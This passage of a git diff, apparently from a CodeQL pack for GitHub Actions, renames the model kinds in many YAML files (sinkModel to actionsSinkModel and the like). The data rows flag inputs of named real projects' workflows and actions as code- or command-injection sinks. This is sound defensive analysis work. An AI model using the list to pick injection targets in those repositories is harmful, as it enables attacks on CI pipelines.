diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index deb10e5e4b4..9add4859f35 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5c22f0ffcb7..efc8097b963 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 790e94c2aac..6a305522cfb 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index fedb21393bc..441325c76a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index f60fffb206e..5f0831afc07 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index c7fe932aba2..afd7aabc1fc 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index d47aea3363f..49e556f585f 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index f32acf5038e..24585aa50ed 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index c739b5750cc..afc7af28f9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 7ac3c0fb530..5b3d91a8a7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index c641035f966..b43253eb619 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index adea8ae4bd2..89559cf57e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 857c946e2b7..6292841e56a 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 717022ea6e8..9f98fd51139 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index 7dadb99209d..e04605511b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index ca3cb0091e9..a77181e6c4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index 6faf8b90057..6c90e29a43b 100644 
--- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 39b6773a2b1..6bacbc181da 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index cbbce950b41..83d438d4e3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 48206551bcd..703a766cb4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 256ad3f0e04..ecb4c809efe 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index ae408b131e0..9b02577be7d 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] @@ -9,6 +9,6 @@ extensions: - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index c7e2cf41b3f..1ffc3df1c81 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 781384a2fe1..53ed1840b0a 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 9036f199f42..17d2ed2e473 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml 
+++ b/ql/lib/ext/go-semantic-release_action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"]
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml
index 7eee95dbcce..68c2552c350 100644
--- a/ql/lib/ext/golangci_golangci-lint-action.model.yml
+++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
index 4fe9e32ce52..977f6b98ae4 100644
--- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
+++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"]
 - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"]
diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
index 0352ece87b5..616f7fdb9ca 100644
--- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml
+++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
index 712f2ce3395..e4961ae5ed6 100644
--- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
+++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"]
 - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"]
diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml
index 45c00c1c30e..19cce83c691 100644
--- a/ql/lib/ext/gradle_gradle-build-action.model.yml
+++ b/ql/lib/ext/gradle_gradle-build-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"]
 - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"]
diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml
index 8f05918155e..f838eeed0eb 100644
--- a/ql/lib/ext/haya14busa_action-cond.model.yml
+++ b/ql/lib/ext/haya14busa_action-cond.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"]
 - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml
index 708c310c05f..48e5b05128f 100644
--- a/ql/lib/ext/hexlet_project-action.model.yml
+++ b/ql/lib/ext/hexlet_project-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"]
diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
index 76177635899..448997b3136 100644
--- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
+++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"]
 - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"]
diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml
index 7106115c17a..13af446f37d 100644
--- a/ql/lib/ext/ilammy_setup-nasm.model.yml
+++ b/ql/lib/ext/ilammy_setup-nasm.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"]
 - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"]
diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml
index 366e5dd1766..39e1c9ef624 100644
--- a/ql/lib/ext/imjohnbo_issue-bot.model.yml
+++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"]
 - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"]
diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml
index a469063fc50..a442ed5cd53 100644
--- a/ql/lib/ext/iterative_setup-cml.model.yml
+++ b/ql/lib/ext/iterative_setup-cml.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml
index d0d5b57574b..a22fce01c45 100644
--- a/ql/lib/ext/iterative_setup-dvc.model.yml
+++ b/ql/lib/ext/iterative_setup-dvc.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
index 3151e335d22..74a5c7d592c 100644
--- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
+++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"]
 - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index e74f953a1a1..e78dfb3b073 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"]
 - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"]
diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
index 0930fc246c3..29dac5cffea 100644
--- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml
+++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml
index 5b344799ad9..f2331633485 100644
--- a/ql/lib/ext/jsdaniell_create-json.model.yml
+++ b/ql/lib/ext/jsdaniell_create-json.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"]
 - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"]
diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml
index 5b6f1342fc4..e492f601278 100644
--- a/ql/lib/ext/jurplel_install-qt-action.model.yml
+++ b/ql/lib/ext/jurplel_install-qt-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"]
 - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"]
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
index b34833d85f3..a821b049232 100644
--- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml
+++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
@@ -1,12 +1,12 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"]
 - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"]
diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
index 9a58d9a764f..4f9f887caf1 100644
--- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
+++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]
 - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]
diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
index 74ef5820cb7..365f3ac98f8 100644
--- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
+++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml
index e05a3afd63a..f42e8465533 100644
--- a/ql/lib/ext/leafo_gh-actions-lua.model.yml
+++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"]
 - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"]
diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
index a96ad45d624..e21b5224166 100644
--- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
+++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"]
diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml
index a70e8facf7c..6c4a5931b98 100644
--- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml
+++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml
@@ -1,6 +1,6 @@
